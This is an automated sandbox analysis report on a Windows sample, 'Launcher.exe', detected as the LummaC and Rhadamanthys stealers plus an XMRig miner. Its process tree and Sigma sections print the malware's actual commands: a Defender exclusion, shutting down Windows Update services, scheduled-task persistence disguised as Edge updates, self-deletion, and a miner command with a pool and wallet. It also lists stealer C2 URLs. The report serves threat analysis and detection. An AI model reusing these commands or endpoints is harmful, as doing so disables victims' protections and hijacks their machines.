
Windows Analysis Report
Launcher.exe

Overview

General Information

Sample name: Launcher.exe
Analysis ID: 1637040
MD5: d91b1e9db00162b86d2d3c14e1a943ce
SHA1: e487b841d7c5f6eb48d0cdd3d36b340636591abe
SHA256: b1938f21d058442903d3d4c4a2aed153d59300cffd933e213acbb9b5e7d7a4be

Detection

LummaC Stealer, RHADAMANTHYS, Xmrig
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Schedule system process
Sigma detected: Xmrig
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected LummaC Stealer
Yara detected RHADAMANTHYS Stealer
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject code into remote processes
DNS related to crypt mining pools
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PE file contains section with special chars
PE file has nameless sections
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sets debug register (to hijack the execution of another thread)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potential Crypto Mining Activity
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Windows Service Tampering
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Launcher.exe (PID: 7732 cmdline: "C:\Users\user\Desktop\Launcher.exe" MD5: D91B1E9DB00162B86D2D3C14E1A943CE)
    • cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7520 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 7556 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5428 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 5832 cmdline: C:\Windows\system32\cmd.exe /d /s /c "net session" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 7652 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 6096 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 3040 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 4508 cmdline: taskkill /F /IM SecHealthUI.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
    • cmd.exe (PID: 3940 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1208 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 4284 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5860 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1844 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • xzuucncwbxucqic.exe (PID: 7588 cmdline: C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe MD5: C565BB41F99B97BBBFCC781D595BC152)
      • xzuucncwbxucqic.exe (PID: 5700 cmdline: "C:\Users\user\AppData\Local\Microsoft\xzuucncwbxucqic.exe" MD5: C565BB41F99B97BBBFCC781D595BC152)
    • wxymrnibweqciwn.exe (PID: 7988 cmdline: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe MD5: D72B6A0764E5D144F92DCCC3E4B23DFE)
      • svchost.exe (PID: 4960 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • fontdrvhost.exe (PID: 6972 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 2888 cmdline: C:\Windows\system32\WerFault.exe -u -p 6972 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • qzemwxiuzucyxcx.exe (PID: 7500 cmdline: C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe MD5: 9D485AE46ACBC7D22DD0655264F3D959)
      • tasklist.exe (PID: 7580 cmdline: "tasklist" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1596 cmdline: "powershell" -Command "Get-WmiObject Win32_PortConnector" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1928 cmdline: "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 2236 cmdline: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • cmd.exe (PID: 1912 cmdline: "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\qzemwxiuzucyxcx.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 3116 cmdline: timeout 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • niyrycbicwuyiuc.exe (PID: 4284 cmdline: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe MD5: 91C7FC26A530DFE8BAF84C9D39646895)
      • powershell.exe (PID: 7868 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5540 cmdline: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 2968 cmdline: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 2956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2896 cmdline: cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 3380 cmdline: timeout /t 5 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 7852 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7892 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • svchost.exe (PID: 7908 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • sppsvc.exe (PID: 7972 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 8020 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 8068 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 4944 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 4936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MicrosoftEdgeUpdate.exe (PID: 7588 cmdline: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe MD5: 9D485AE46ACBC7D22DD0655264F3D959)
  • powershell.exe (PID: 3488 cmdline: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 7216 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7456 cmdline: C:\Windows\system32\WerFault.exe -pss -s 472 -p 6972 -ip 6972 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 7528 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RtkAudUService64a.exe (PID: 4132 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2 MD5: 037F02C0AB286C14EB4EEFF4078F8D34)
    • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Rhadamanthys | According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines. At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine. | Sandworm | | https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
xmrig | According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
{"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "9eddd878e03715edd627f50c1f29ec6d309b2d28521a9b9872d266ca"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
dump.pcap | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | 0xf1062f:$a1: mining.set_target; 0xf0a76f:$a2: XMRIG_HOSTNAME; 0xf0cc7b:$a3: Usage: xmrig [OPTIONS]; 0xf0a747:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
00000040.00000002.2496546660.000001FE48C69000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
0000001E.00000003.1861315526.0000000000970000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RHADAMANTHYS | Yara detected RHADAMANTHYS Stealer | Joe Security |
00000040.00000002.2492130397.00000021331BA000.00000004.00000010.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security |
00000040.00000000.1979728835.00007FF7283B4000.00000002.00000001.01000000.0000000F.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown | 0x12da08:$a1: mining.set_target; 0x1284e8:$a2: XMRIG_HOSTNAME; 0x12a5b0:$a3: Usage: xmrig [OPTIONS]; 0x1284c0:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
29.2.xzuucncwbxucqic.exe.400000.1.raw.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
29.2.xzuucncwbxucqic.exe.400000.1.unpack | JoeSecurity_LummaCStealer_4 | Yara detected LummaC Stealer | Joe Security |
56.3.svchost.exe.55e0000.7.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
56.3.svchost.exe.53c0000.6.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
56.3.svchost.exe.55e0000.7.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |

Bitcoin Miner

Source: Process started | Author: Joe Security | Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4000, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, ProcessId: 4132, ProcessName: RtkAudUService64a.exe

System Summary

Source: File created | Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ProcessId: 4284, TargetFilename: C:\ProgramData\WinUpdate32\RuntimeBroker.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4000, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, ProcessId: 4132, ProcessName: RtkAudUService64a.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 7732, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 3940, ProcessName: cmd.exe
Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems), frack113 | Data: Command: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", ProcessId: 5540, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Launcher.exe", ParentImage: C:\Users\user\Desktop\Launcher.exe, ParentProcessId: 7732, ParentProcessName: Launcher.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 3940, ProcessName: cmd.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentImage: C:\Users\user\AppData\Local\Temp\niyrycbicwuyiuc.exe, ParentProcessId: 4284, ParentProcessName: niyrycbicwuyiuc.exe, ProcessCommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, ProcessId: 2968, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", CommandLine: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1928, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", ProcessId: 2236, ProcessName: schtasks.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe, ParentImage: C:\Users\user\AppData\Local\wxymrnibweqciwn.exe, ParentProcessId: 7988, ParentProcessName: wxymrnibweqciwn.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 4960, ProcessName: svchost.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7556, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", ProcessId: 5428, ProcessName: powershell.exe
